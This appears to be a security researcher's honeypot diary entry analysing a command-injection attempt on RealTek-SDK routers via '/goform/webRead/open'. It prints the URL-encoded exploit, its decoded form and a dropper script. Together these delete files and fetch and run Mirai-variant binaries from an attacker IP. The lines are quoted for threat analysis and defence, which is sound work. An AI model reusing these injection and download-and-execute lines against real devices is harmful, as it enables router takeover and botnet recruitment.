Today, I noticed the following URL showing up in our "First Seen" list:

/goform/webRead/open/?path=|rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Fbruh.sh%3B%20chmod%20777%20bruh.sh%3B%20.%2Fbruh.sh

Initially, our sensors detected requests for just "goform/webRead/open". 

URLs containing "goform" are typically associated with the RealTek SDK. Routers built around the RealTek SoC (System on a Chip) usually use the SDK to implement web-based access tools. The RealTek SDK had numerous vulnerabilities in the past. We currently track over 900 unique URLs in our honeypots using a "/goform/" URL. The most popular URL is usually "goform/set_LimitClient_cfg", associated with CVE-2023-26801 in LB-Link routers. But simple password brute force attacks are also common, taking advantage of default passwords.

So far, I have not been able to identify a specific CVE number for vulnerabilities related to  "goform/webRead/open". However, a Chinese blog post from November [1] suggests that this is related to a vulnerability in routers made by the Chinese company "BYTEVALUE." I could not find a patch for the vulnerability.

The exploit attempt In the URL above follows the standard command injection pattern. URL decode leads to:

rm -rf *; cd /tmp; wget http://192.3.152.183/bruh.sh; chmod 777 bruh.sh; ./bruh.sh

With "bruh.sh" being the typical shell script downloading the next stage for various architectures:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lol http://192.3.152.183/mips; chmod +x lol; ./lol 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lmao http://192.3.152.183/mpsl; chmod +x lmao; ./lmao 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kekw http://192.3.152.183/i686; chmod +x kekw; ./kekw 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O what http://192.3.152.183/powerpc; chmod +x what; ./what 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kys http://192.3.152.183/sh4; chmod +x kys; ./kys 0day_router
[I removed various versions that used offensive filenames]

The binary is simply UPX-packed. The binary contains strings pointing to other router exploits and paths in "/home/landley/", which may indicate the system the binary was compiled on.

Virustotal did not have a sample yet when I uploaded mine [2]. However, the sample is well recognized as a "Mirai" variant that appears correct.

[1] https://blog.csdn.net/zkaqlaoniao/article/details/134328873
[2] https://www.virustotal.com/gui/file/0d0f841ff15c3a01e5376ec7453c2465ec87a9450a21053c3ab4fcb9bbbe1605?nocache=1

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|